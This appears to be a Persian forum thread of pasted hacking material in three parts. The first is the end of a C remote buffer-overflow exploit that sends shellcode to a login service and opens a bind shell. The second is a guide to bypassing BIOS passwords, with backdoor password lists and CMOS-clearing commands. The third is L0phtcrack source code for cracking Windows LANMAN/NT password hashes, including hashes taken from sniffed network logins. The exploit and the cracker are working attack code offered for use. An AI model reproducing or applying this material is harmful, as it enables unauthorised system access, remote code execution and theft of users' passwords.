  tar = atoi(argv[2]);
  retaddr = offsets[tar];


  printf("- Using return address of 0x%8x : %s\n",retaddr,targets[tar]);
  printf("\n[+] Initialize socket.");
  if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
	perror("[x] Error socket. Exiting...\n");
	keepout();
  }

  memset(&target,0x00,sizeof(target));
  target.sin_family = AF_INET;
  target.sin_addr.s_addr = gimmeip(argv[1]);
  target.sin_port = htons(tport);


  printf("\n[+] Prepare exploit buffer... ");
  memset(expbuff, 0x00, BUFSIZE);
  memset(recvbuff, 0x00, BUFSIZE);
  

  memcpy(expbuff, login[2], strlen(login[2]));
  p =  &expbuff[strlen(login[2]) ];
 
  memset(p, NOP, LSZ);
  memcpy(&expbuff[10],shellcode,sizeof(shellcode)-1);

  *(unsigned long *)&expbuff[507] = retaddr;
  p =  &expbuff[511];
  memcpy(p, "\n",1);
  
  printf("\n[+] Connecting at %s:%hu...", argv[1], tport);
  fflush(stdout);
  if (connect(sock,(struct sockaddr*)&target,sizeof(target))!=0) {
  	fprintf(stderr,"\n[x] Couldn't establish connection. Exiting...\n");
  	keepout();
  }
  printf(" - OK.\n");
  len = recv(sock, recvbuff, BUFSIZE-1, 0);
  if(len < 0) {
	fprintf(stderr,"\nError response server\n");
  	exit(1);
  }
  
  printf("    - Size of payload is %d bytes",strlen(expbuff));


  printf("\n[+] Initiating exploit... ");
  printf("\n    - Sending USER...");
  if(send(sock,login[0],strlen(login[0]),0)==-1) {
	fprintf(stderr,"\n[-] Exploit failed.\n");
	keepout();
  }

  len = recv(sock, recvbuff, BUFSIZE-1,0);
  if(len < 0) {
	fprintf(stderr,"\nError recv.");
	exit(1);
  }
  recvbuff[len] = 0;

  printf("\n    - Sending PASS...");
  
  if(send(sock,login[1],strlen(login[1]),0)==-1) {
    printf("\n[-] Exploit failed.\n");
	keepout();
  }

  len = recv(sock, recvbuff, BUFSIZE, 0);
  if(len < 0) {
	fprintf(stderr,"\nError recv.");
	exit(1);
  }
  recvbuff[len] = 0;

  printf("\n    - Creating X-DIR...");
  
  if(send(sock,login[3],strlen(login[3]),0)==-1) {
    printf("\n[-] Exploit failed.\n");
	keepout();
  }

  len = recv(sock, recvbuff, BUFSIZE, 0);
  if(len < 0) {
	fprintf(stderr,"\nError recv.");
	exit(1);
  }
  recvbuff[len] = 0;

  if(send(sock,login[4],strlen(login[4]),0)==-1) {
    printf("\n[-] Exploit failed.\n");
	keepout();
  }

  len = recv(sock, recvbuff, BUFSIZE, 0);
  if(len < 0) {
	fprintf(stderr,"\nError recv.");
	exit(1);
  }
  recvbuff[len] = 0;

  printf("\n    - Sending Exploit String...");
  if(send(sock,expbuff,strlen(expbuff),0)==-1) {
	printf("\n[-] Exploit failed.\n");
	keepout();
  }

  printf("- OK.");
  
  printf("\n[+] Now try to connect to the shell on %s:101\n", argv[1] );



#ifdef WIN
  closesocket(sock);
  WSACleanup();
#else
  close(sock);
#endif

  return(0);
}
// persiannetworks.com

**!!!!!!!!!!!!!!!** · 2006-05-01, 03:07 PM

کد HTML:

Fellow Wrapster/BearShare/Gnutella user.
As you can see there are various ways on bypassing/changing BIOS passwords.
I have successfully used all of the options below on various computers many years ago. These methods will work on computers of today. I have updated the Standard BIOS backdoor passwords for current computers made as of last week. ( big grin ).
READ EVEYTHING BEFORE YOU USE ANY METHOD LISTED BELOW.

Basic BIOS password crack - works 9.9 times out of ten
This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:
Get DOS prompt and type:
DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter
Restart the computer. It works on most versions of the AWARD BIOS.

Accessing information on the hard disk

When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk.

Standard BIOS backdoor passwords
The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer's backdoor passwords:
AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet, %øåñòü ïpîáåëîâ%, %äåâÿòü ïpîáåëîâ%
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder
Other passwords you may try (for AMI/AWARD or other BIOSes)
LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj
Note that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards (such as Italian and German ones), so -- for example -- you should type AWARD?SW when using those keyboards. Also remember that passwords are Case Sensitive. The last two passwords in the AWARD BIOS list are in Russian.

Flashing BIOS via software
If you have access to the computer when it's turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory.
However, it might happen you don't have one of those programs when you have access to the computer, so you'd better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You'd better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:
AMI/AWARD BIOS
O 70 17
O 71 17
Q
PHOENIX BIOS
O 70 FF
O 71 17
Q
GENERIC
Invalidates CMOS RAM.
Should work on all AT motherboards
(XT motherboards don't have CMOS)
O 70 2E
O 71 FF
Q
Note that the first letter is a "O" not the number "0". The numbers which follow are two bytes in hex format.

Flashing BIOS via hardware
If you can't access the computer when it's on, and the standard backdoor passwords didn't work, you'll have to flash the BIOS via hardware. Please read the important notes at the end of this section before to try any of these methods.
Using the jumpers
The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (for "switching a jumper" I mean that you find a jumper that joins the central pin and a side pin of a group of three pins, you should then unplug the jumper and then plug it to the central pin and to the pin on the opposite side, so if the jumper is normally on position 1-2, you have to put it on position 2-3, or vice versa). This jumper is not always located near to the BIOS, but could be anywhere on the motherboard.
To find the correct jumper you should read the motherboard's manual.
Once you've located the correct jumper, switch it (or plug or unplug it, depending from what the manual says) while the computer is turned OFF. Wait a couple of seconds then put the jumper back to its original position. In some motherboards it may happen that the computer will automatically turn itself on, after flashing the BIOS. In this case, turn it off, and put the jumper back to its original position, then turn it on again. Other motherboards require you turn the computer on for a few seconds to flash the BIOS.
If you don't have the motherboard's manual, you'll have to "brute force" it... trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the BIOS, and the ones you can switch (as I explained before). If all them fail, try all the others. However, you must modify the status of only one jumper per attempt, otherwise you could damage the motherboard (since you don't know what the jumper you modified is actually meant for). If the password request screen still appear, try another one.
If after flashing the BIOS, the computer won't boot when you turn it on, turn it off, and wait some seconds before to retry.
Removing the battery
If you can't find the jumper to flash the BIOS or if such jumper doesn't exist, you can remove the battery that keeps the BIOS memory alive. It's a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you'll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I'd suggest you to remove it for about one hour to be sure, because if you put it back when the data aren't erased yet you'll have to wait more time, as you've never removed it. If at first it doesn't work, try to remove the battery overnight.
Important note: in laptop and notebooks you don't have to remove the computer's power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard.
Short-circuiting the chip
Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before to try this operation.
Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If you find the BIOS chip you are working on matches with one of the following you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.
CHIPS P82C206 (square)
Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).
gnd
74
|__________________
5v 75--| |
| |
| |
| CHIPS |
1 * | |
| P82C206 |
| |
| |
|___________________|
| |
| gnd | 5v
12 32
OPTi F82C206 (rectangular)
Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).
80 51
|______________|
81 -| |- 50
| |
| |
| OPTi |
| |
| F82C206 |
| |
100-|________________|-31
|| | |
1 || | | 30
3 26

Dallas DS1287, DS1287A
Benchmarq bp3287MT, bq3287AMT
The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can't flash the BIOS by removing a battery). When the battery fails, the RTC chip would be replaced.
CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.
The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can't be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21 RCL (RAM Clear)
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13

NOTE: Although these are 24-pin chips,
the Dallas chips may be missing 5 pins,
these are unused pins.
Most chips have unused pins,
though usually they are still present.

Dallas DS12885S
Benchmarq bq3258S
Hitachi HD146818AP
Samsung KS82C6818A
This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818.
Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.
Short together pins 12 and 24.

5v
24 20 13
|___________|____________________|
| |
| DALLAS |
|> |
| DS12885S |
| |
|__________________________________|
| |
1 12
gnd

Motorola MC146818AP
Short pins 12 and 24. These are the pins on diagonally opposite corners - lower left and upper right. You might also try pins 12 and 20.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13

Replacing the chip
If nothing works, you could replace the existing BIOS chip with a new one you can buy from your specialized electronic shop or your computer supplier. It's a quick operation if the chip is inserted on a base and not soldered to the motherboard, otherwise you'll have to unsolder it and then put the new one. In this case would be more convenient to solder a base on which you'll then plug the new chip, in the eventuality that you'll have to change it again. If you can't find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of the ones shown above) and look in your motherboard manufacturer's website to see if there's the BIOS image to download. Then you should copy that image on the chip you bought with an EPROM programmer.
Important
Whether is the method you use, when you flash the BIOS not only the password, but also all the other configuration data will be reset to the factory defaults, so when you are booting for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.
Also, when you boot Windows, it may happen that it finds some new device, because of the new configuration of the BIOS, in this case you'll probably need the Windows installation CD because Windows may ask you for some external files. If Windows doesn't see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can't find the CD-ROM drive and you set it properly from the BIOS config, just reboot with the reset key, and in the next run Windows should find it. However most files needed by the system while installing new hardware could also be found in C:\WINDOWS, C:\WINDOWS\SYSTEM, or C:\WINDOWS\INF .

Key Disk for Toshiba laptops
Some Toshiba notebooks allow to bypass BIOS by inserting a "key-disk" in the floppy disk drive while booting. To create a Toshiba Keydisk, take a 720Kb or 1.44Mb floppy disk, format it (if it's not formatted yet), then use a hex editor such as Hex Workshop to change the first five bytes of the second sector (the one after the boot sector) and set them to 4B 45 59 00 00 (note that the first three bytes are the ASCII for "KEY" :) followed by two zeroes). Once you have created the key disk put it into the notebook's drive and turn it on, then push the reset button and when asked for password, press Enter. You will be asked to Set Password again. Press Y and Enter. You'll enter the BIOS configuration where you can set a new password.

Key protected cases
A final note about those old computers (up to 486 and early Pentiums) protected with a key that prevented the use of the mouse and the keyboard or the power button. All you have to do with them is to follow the wires connected to the key hole, locate the jumper to which they are connected and unplug it. That's all.

Use the Force, Nuke!!!!!!
CinCyDNA

**!!!!!!!!!!!!!!!** · 2006-05-01, 03:19 PM

کد HTML:

/* L0phtcrack 1.5 06.02.97 mudge@l0pht.com
   The original comments are left below for those that missed the first
   release. It still does all of the things the first one did PLUS:

   . Can now dictionary attack or brute force the network NT server 
     challenge that is used to prevent the OWF from going across the
     wire in its plaintext format. Here's how their setup works:

        [assuming initial setup etc...]

           8byte "random" challenge
     Client <---------------------- Server
     OWF1 = pad Lanman OWF with 5 nulls
     OWF2 = pad NT OWF with 5 nulls
     resp = E(OWF1, Chal) E(OWF2, Chal)
           48byte response (24byte lanman 24byte nt)
     Client -----------------------> Server

     The client takes the OWF ( all 16 bytes of it) and pads with 5 nulls. 
     From this point it des ecb encrypts the, now 21byte, OWF with the
     8byte challenge. The resulting 24byte string is sent over to the
     server who performs the same operations on the OWF stored in it's
     registry and compares the resulting two 24byte strings. If they 
     match the user used the correct passwd.

     What's cool about this? Well, now you can take your sniffer logs
     of NT logons and retrieve the plaintext passwords. This does not
     require an account on the NT machine nor does it require previous
     knowledge of the ADMINISTRATOR password. 

     See, the problem was that of Microsoft's horrible marketing driven 
     patch to prevent pwdump from working. [elaborate on why that sucked]

   . Recursion has been removed from both the brute forcing in the Lanman
     case and also in the NT case derivation from the Lanman password.
     The iterative functions, although they don't logically represent
     the problem as well as their recursive predecessors, are much more
     memory friendly.

   . The large bruter routine no longer overflows the Pentium L2 cache,
     well it didn't seem to do so bad if you had a 512k L2 cache as opposed
     to a 256k on. This offers a large performance increase in bruting.

   . A couple of bugs were fixed.

/* NT-Cracker 03.24.97 mudge@l0pht.com
   This program takes the smbpassword file or the output generated by
   the excellent program pwdump (author name) and dictionary attacks
   the LANMAN One Way Password - 

  LANMAN One Way Passwords are created in the following fashion:
	. The password is first converted to uppercase
	. If the password is longer than 14 chars (bytes) then it
		is truncated
	. If the password is less than 14 chars (bytes) then it is
		padded with NULL's to 14 bytes.
	. The padded/truncated password is then split in half and each
		half is used to generate an odd parity DES key
	. An 8 byte fixed value is then encrypted with each of the
		DES keys - these two results are concatenated together
		to produce a 16byte hash.

	The fixed value that is encrypted by each of the DES keys is the 
	decryption of the value 0xAAD3B435B51404EE with a key of all zeros.

  Todo: add an entire keyspace attack to guarantee 
        we get all of the passwords
  Todo: Roll this into pwdump and add the ability to try to brute 
        force the administrators passwords on remote machines to obtain 
		full user listings and OWPasswords.
  Todo: GUI for the Windows users - weld's job
  Todo: CLI portable
  Todo: If not bruting - let people know if we couldn't find the passwd in a 
      dictionary and the word is <= 7 chars

  Crikey! Now I see where ECB mode is going to kill them in the NT 
  dialect - this should make bruting either one trivial!

  BIG KUDOS go out to Hobbit@avian.org for his outstanding work in debunking
  CIFS. Without information provided in his paper this program wouldn't be
  here!

  This work is provided by the L0pht - it contains code from the 
  following places:
		. Plenty of original code
		. generic routines from the samba code source
		. md4 routines from RSA
		. DES routines from Eric Young's libdes
*/

#include "includes.h"

void f2(struct user_struct *Ustruct, char *str);
extern void fill_user_struct(char *dastring, struct user_struct *da_struct);
extern void str_to_key(unsigned char *,unsigned char *);
extern void usage(char *);
extern void LMword(char *, char *);
extern char * atob(char *, int);
extern int htoi(char c);
int crackntdialect(struct user_struct *Ustruct, char *passwd, int check_case);
void md4hash(char *passwd, unsigned char *p16, int len);
extern int PutUniCode(char *dst,char *src);
void chcase(char *str, int pos);
void LowerString(char *holder, char *word);
void printuser(struct user_struct *Ustruct, FILE *file);
int cracklanman(struct user_struct *Ustruct, char *dict_word, char *tmphash);
extern int isvalid_userline(char *user_entry);
extern struct user_struct * init_linked_list();
extern void add_list_struct(struct user_struct *, char *);
extern struct user_struct * remove_from_list(struct user_struct *);
extern struct user_struct * rewind_list(struct user_struct *);
extern void print_and_prune(struct user_struct *record, FILE *outlist);
extern void build_linked_list(struct user_struct *head, FILE *pwlist);
extern struct user_struct * filter_disabled(struct user_struct *head, FILE *outlist);
extern struct user_struct * filter_nopasswd(struct user_struct *head, FILE *outlist);
extern struct user_struct * setup_linked_list(int, FILE *, FILE *);
int Lanman(struct user_struct *index, char *dict_word, FILE *outlist);
int nt(struct user_struct *index, char *dict_word, FILE *outlist);
int Lanman_and_nt(struct user_struct *index, char *dict_word, FILE *outlist);
extern void free_struct_list(struct user_struct *);
int brute_lanman(struct user_struct *Ustruct, FILE *outlist);
void half_lanman(char *, char *);
int brute_routine(struct user_struct *head, char *half_hash, char *, int iter);
int lm_check_sniff(struct user_struct *, char *);
int nt_check_sniff(struct user_struct *, char *);
extern void nt_ify_list(struct user_struct *head);
extern void print_hits(struct user_struct *head, FILE *outlist);
extern struct user_struct * prune_list(struct user_struct *head);
extern void E_P24(uchar *, uchar *, uchar *);
int issame(char *, char *, int);


/* Global str_to_crypt - this is what is encrypted with each of the 
   odd parity DES keys for LANMAN - It is derived by decrypting the 
   fixed byte quantity 0xAAD3B435B51404EE with a key
   of all 0's ie:
   	
	fixed_key[] = "\xAA\xD3\xB4\x35\xB5\x14\x04\xEE";
	memset(deskey3, '\0', sizeof(deskey3)); - key of all 0's
	des_set_key((des_cblock *)deskey3, ks3); 
	des_ecb_encrypt((des_cblock *)fixed_key,
  	    (des_cblock *)str_to_crypt, ks3, DES_DECRYPT);
*/

char str_to_crypt[] = "\x4b\x47\x53\x21\x40\x23\x24\x25";

void main(int argc, char **argv) {
	FILE *pwlist, *wordlist, *outlist;
	char dict_word[MAX_WORD];
	char *pwfile, *wordfile, *outfile;
	struct user_struct *head, *index, *foo, *bar;
	extern char *optarg;
	int c, pcount=0, Pcount=0, wcount=0, ocount=0, brute=0;
	int lanonly=0, ntonly=0;
	int ret=0;

	while ( (c = getopt(argc, argv, "p:P:w:blno:")) != EOF){
		switch(c) {
		case 'p': /* passwd file from pwdump */
			pwfile = optarg;
			pcount++;
			break;
		case 'P': /* passwd file from sniffer logs -  
			     we will look at Pcount / pcount to figure
			     out what type of file pwfile is really pointing
			     to */
			pwfile = optarg;
			Pcount++;
			break;
		case 'w': /* dictionary of words */
			wordfile = optarg;
			wcount++;
			break;
		case 'o': /* output file */
			outfile = optarg;
			ocount++;
			break;
		case 'l': /* crack LANMAN password ONLY */
			lanonly++;
			break;
		case 'n': /* crack NT Dialect only - dumb - 
			     better performance cracking both */
			ntonly++;
			break;
		case 'b': /* brute force through keyspace */
			brute++;
			break;
		default:
			usage(argv[0]);
		}
	}

	if ((pcount == 0 && Pcount == 0) || (pcount > 0 && Pcount > 0))
		usage(argv[0]);
	else if ((wcount == 0 && brute == 0) || (wcount > 0 && brute > 0))
		usage(argv[0]);

	if (lanonly > 0 && ntonly > 0)
		usage(argv[0]);

	if ((pwlist = fopen(pwfile, "r")) == NULL){ 
		fprintf(stderr, "Error: could not open %s\n", pwfile);
		exit(1);
	}

	if (wcount > 0 ) {
	  if ((wordlist = fopen(wordfile, "r")) == NULL){
	  	  fprintf(stderr, "Error: could not open %s\n", wordfile);
		  exit(1);
	  }
	}
	
	if (ocount > 0){
		if ((outlist = fopen(outfile, "w")) == NULL){
			fprintf(stderr, "Error: could not open %s\n", outfile);
			exit(1);
		}
	} else
		outlist = stdout;

	head = setup_linked_list(pcount, pwlist, outlist); /* pcount will
				be 1 if it's a regular pwdump file and
				0 if it is a sniffer log with the 
				challenge response */

	foo = index = head;


	/* main loop */

	head = rewind_list(index);
	index = foo = bar = head;

	if (head == NULL){
		fprintf(stderr, "Nothing to do so I guess I'm done\n");
		exit(1);
	}

	if (brute){
		ret = brute_lanman(index, outlist);
	}else{
		while (fgets(dict_word, MAX_WORD, wordlist) != NULL) {

			head = rewind_list(index);
			index = foo = bar =  head;
			
			if (head == NULL){
				fprintf(stderr, "Done\n");
				exit(1);
			}

			while (bar != NULL){
				if (lanonly){
					Lanman(index, dict_word, outlist);
				} else if (ntonly) {
					nt(index, dict_word, outlist);
				} else {
					Lanman_and_nt(index, dict_word, outlist);				
				}	
				if (index->next == NULL){
					bar = NULL;
				}else{
					index = index->next;
				}
			} 
		
		}
	} /* else from brute_lanman */	

        if (ret == 0){ /* if ret is > 0 then we have already pruned ALL
                          of the structs in the list...  */
	  head = rewind_list(index);
	  free_struct_list(head);
        }
	if (ocount > 0)
		fclose(outlist);
	if (wcount > 0)
		fclose(wordlist);
	if (pcount > 0)
		fclose(pwlist);
}

/* routine to check the LANMAN passwd */
int cracklanman(struct user_struct *Ustruct, char *dict_word, char *fullhash){
  unsigned char passwd[14];
  unsigned char lanman[16];
  des_cblock deskey1, deskey2;
  des_key_schedule ks1, ks2;


  memset(passwd, '\0', sizeof(passwd));
  memset(lanman, '\0', sizeof(lanman));

  LMword((char *)passwd, dict_word); /* uppercases and 
                                        truncs/concats word into passwd */
  if (!Ustruct->pwdumpval){
    if (lm_check_sniff(Ustruct, passwd) == 1)
      return(1);
    else
      return(0);
  }

  str_to_key(passwd, deskey1);  /* create the first 8byte odd 
                                   parity des key */
  des_set_key((des_cblock *)deskey1,ks1); /* setup the key schedule */

  des_ecb_encrypt((des_cblock *)str_to_crypt, /* encrypt the known 
                                                 8byte value */
              (des_cblock *)lanman, ks1, DES_ENCRYPT); /* against the 
                                                   first des key */

  str_to_key(&(passwd[7]), deskey2);
  des_set_key((des_cblock *)deskey2,ks2);

  des_ecb_encrypt((des_cblock *)str_to_crypt,\
                              (des_cblock *)&lanman[8], ks2, DES_ENCRYPT);

  strncpy(fullhash, (const char *)lanman, sizeof(lanman));

  if (memcmp(Ustruct->lmhashb, lanman, sizeof(lanman)) == 0){
    strncpy(Ustruct->lmpasswd, (const char *)passwd, LMPASSWDLEN);
    return(1);
  }
  return(0);
}

/* routine to check the md4 NT dialect passwd derived from the 
   succesfull LANMAN passwd.  returns 1 if succesfull, 0 otherwise  - 
   if check case is > 0 then all possible permutations of upper/lower 
   are tried, if <=0 then just try the word in the case that we recieved 
   it in. */
int crackntdialect(struct user_struct *Ustruct, char *passwd, int check_case){
	
  char ntpasswd[129]; 
  char *hold;
  unsigned char *p16;
  int pos, uni_len;

  memset(ntpasswd, '\0', sizeof(ntpasswd));

  if (check_case){ /* go through the possible case sensitive perms */
    LowerString(ntpasswd, passwd);
    pos = strlen(passwd) -1;
    f2(Ustruct, ntpasswd);
  }else{ /* not interested in case sensitivity - just try the dict word as
            we have it */

    if (passwd[strlen(passwd)-1] == '\n') /* strip the \n - this 
                                is done in LowerString for the case sensitive
                                check */
    passwd[strlen(passwd)-1] = '\0';

    hold = (char *)malloc(NTPASSWDLEN * 2); /* grab space for 
                                               unicode */
    if (hold == NULL){
      fprintf(stderr, "out of memory...crackntdialog hold\n");
      exit(1);
    }

    uni_len = PutUniCode(hold, passwd); /* convert to 
                                           unicode and return correct 
                                           unicode length for md4 */

    p16 = (unsigned char*)malloc(16); /* grab space for md4 hash */
    if (p16 == NULL){
      fprintf(stderr, "out of memory...crackntdialect p16\n");
      exit(1);
    }

    md4hash(hold, p16, uni_len);
    if (Ustruct->pwdumpval){
      if (memcmp(p16, &Ustruct->nthashb, 16) == 0)
        strncpy(Ustruct->ntpasswd, passwd, NTPASSWDLEN);
    } else {
      if (nt_check_sniff(Ustruct, p16) == 1){
        strncpy(Ustruct->ntpasswd, passwd, NTPASSWDLEN);
      }
    }
    free(p16);
    free(hold);
  }

  if (strlen(Ustruct->ntpasswd) > 0){
    Ustruct->ntdone = 1;
    return(1);
  } else
    return(0);
}

/* Recursively check all variations on case as the NT Dialect passwd is case
   sensitive. This isn't too bad as the total possible perms is only 2 to the 
   power of strlen(wordtocompare). We really need to make this iterative 
   to save on memory and increase speed. If the function finds a match it
   puts it in Ustruct->ntpasswd. */
void f2(struct user_struct *Ustruct, char *str){
  unsigned long i,j;
  char tmp[128], hold[256]; 
  char ntresp[21], response[24];
  unsigned char p16[16]; 
  int len, uni_len, iters;

  len = strlen(str);
  iters = 1 << len;

#ifdef _DEBUG
  printf("str: %s - len: %d\n", str, len);
  fflush(NULL);
#endif

  for (i=0; i<iters; i++) {   
    strcpy(tmp, str); 
    /* Set case for this round  */
    for (j=0; j<len; j++) { 
      if ( i & (1 << j)) {
        tmp[j] = toupper(tmp[j]);
      } 
    } 
#ifdef _DEBUG 
    printf("%d: %x %s \n", i, tmp, tmp);
    fflush(NULL); 
#endif  
    uni_len = PutUniCode(hold, tmp);

    md4hash(hold, p16, uni_len);
    if (Ustruct->pwdumpval){  /* we're dealing with pwdump */
      if (memcmp(p16, Ustruct->nthashb, 16) == 0){ 
        strncpy(Ustruct->ntpasswd, tmp, NTPASSWDLEN);
        return;
        /* finished=1; */
      }
    } else {  /* we're dealing with sniffer logs */
      if (nt_check_sniff(Ustruct, p16) == 1){
        strncpy(Ustruct->ntpasswd, tmp, NTPASSWDLEN);
        return;
      }
    }
  }
}

/* 
 * Creates the MD4 Hash of the users password in NT UNICODE.
 */
 
void md4hash(char *passwd, unsigned char *p16, int len)
{
	int i=0;
	MDstruct MD;
  
	MDbegin(&MD);
	for(i = 0; i + 64 <= len; i += 64){
		MDupdate(&MD,(unsigned char *)passwd + (i/2), 512);
#ifdef BIGENDIAN
		MDreverse(MD.buffer);
#endif
	}
	MDupdate(&MD,(unsigned char *)passwd + (i/2),(len-i)*8);
#ifdef BIGENDIAN
	MDreverse(MD.buffer);
#endif
/*	MDprint(&MD); 
	   printf("\n");  */

	memcpy(p16, (unsigned char *)MD.buffer, 16);
/*
	SIVAL(p16,0,MD.buffer[0]);
	SIVAL(p16,4,MD.buffer[1]);
	SIVAL(p16,8,MD.buffer[2]);
	SIVAL(p16,12,MD.buffer[3]);
*/

}


void LowerString(char *holder, char *word){
	size_t i;
	int word_len;
 
	word_len = strlen(word);

	if (strlen(word) > 128)
		word[128] = '\0';

	for (i=0; i < word_len; i++){
		if (isupper(word[i]))
		  holder[i] = tolower(word[i]);
		else
		  holder[i] = word[i];
	}
	if (holder[word_len - 1] == '\n')
	  holder[word_len - 1] = '\0';

}

void chcase(char *str, int pos){
	str[pos] = toupper(str[pos]);
}

void printuser(struct user_struct *Ustruct, FILE *file){
  if (Ustruct->already_printed == 1)
	return;
  else {
	fprintf(file, "User: [%s] Lanman PW: [%s] NT dialect PW: [%s]\n",
		Ustruct->username, Ustruct->lmpasswd, Ustruct->ntpasswd);
		Ustruct->already_printed = 1;
		fflush(file);
	}
}

int Lanman(struct user_struct *index, char *dict_word, FILE *outlist){

  struct user_struct *foo;
  char match_lmpasswd[14], match_lmhash[32], tmphash[16];
  int ret=0;

  if (index->lmdone == 1){
    printuser(index, outlist);
    return(1);
  }else{
     if (index->pwdumpval){ /* doing the pwdump file */
       if (cracklanman(index, dict_word, tmphash) == 1){
         printuser(index, outlist);
         index->lmdone = 1;
         strcpy(match_lmpasswd, index->lmpasswd);
         memcpy(match_lmhash, index->lmhash, 32);
         ret = 1;
       }
       foo = index->next;
       while (foo != NULL){
         if (memcmp(foo->lmhashb, tmphash, 16) == 0){
           LMword(match_lmpasswd, dict_word);
           strcpy(foo->lmpasswd, match_lmpasswd);
           foo->lmdone = 1;
           foo = foo->next;
         } else {
           foo = foo->next;
         }
       }
     } else { /* doing the sniffer logs */ 
       LMword(match_lmpasswd, dict_word);
       if (lm_check_sniff(index, match_lmpasswd) == 1){
         printuser(index, outlist);
         index->lmdone = 1;
         ret = 1;
       }
     }
  }
  return(ret);
}

int nt(struct user_struct *index, char *dict_word, FILE *outlist){
  struct user_struct *foo;
  char match_ntpasswd[129], match_nthash[32];
	
  if (index->ntdone == 1){
    printuser(index, outlist);
    return(1);
  }else{
    if (crackntdialect(index, dict_word, 1) == 1){
      printuser(index, outlist);
      index->ntdone = 1;
      if (index->pwdumpval){
        strcpy(match_ntpasswd, index->ntpasswd);
        memcpy(match_nthash, index->nthash, 32);
        foo = index->next;
        while (foo != NULL){
          if (memcmp(foo->nthash, match_nthash, 32) == 0){
            strcpy(foo->ntpasswd, match_ntpasswd);
            foo->ntdone = 1;
            foo = foo->next;
          } else
            foo = foo->next;
        }
      }
      return(1);
    }
  }
  return(0);
}

int Lanman_and_nt(struct user_struct *index, char *dict_word, FILE *outlist){

  struct user_struct *foo;
  char match_lmpasswd[15], match_lmhash[32];
  char tmphash[16];
  int ret=0;

  if (index->lmdone == 1 && index->ntdone){
    printuser(index, outlist);
    return(1);
  }else{
    if (cracklanman(index, dict_word, tmphash) == 1){
      index->lmdone = 1;
      strcpy(match_lmpasswd, index->lmpasswd);
      memcpy(match_lmhash, index->lmhash, 32);
      if (crackntdialect(index, index->lmpasswd, 1) == 1){
    /* printuser(index, outlist); */
        index->ntdone = 1;
      }
      ret = 1;
      if ((index->lmdone) || (index->ntdone))
        printuser(index, outlist);
    }		
    if (index->pwdumpval){
      foo = index->next;
      while (foo != NULL){
        if (memcmp(foo->lmhashb, tmphash, 16) == 0){
          LMword(match_lmpasswd, dict_word);
          strcpy(foo->lmpasswd, match_lmpasswd);
          foo->lmdone = 1;
          crackntdialect(foo, foo->lmpasswd, 1);
          foo = foo->next;
        } else {
          foo = foo->next;
        }
      }
    }
  }
  return(ret);
}

int brute_lanman(struct user_struct *head, FILE *outlist){
  char brute_str[7];
  char all_chars[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
  char half_hash[8];
  char tmp[128];
  int spacelen = strlen(all_chars);
  int pwlen = 7;
  char *tmpspace[7+1];
  struct user_struct *index;
  int i;
  int size;

  size = strlen(all_chars);

  index = head;

  memset(brute_str, '\0', sizeof(brute_str));

  memset(tmp, '\0', sizeof(tmp));

  /* initialize the pointers */
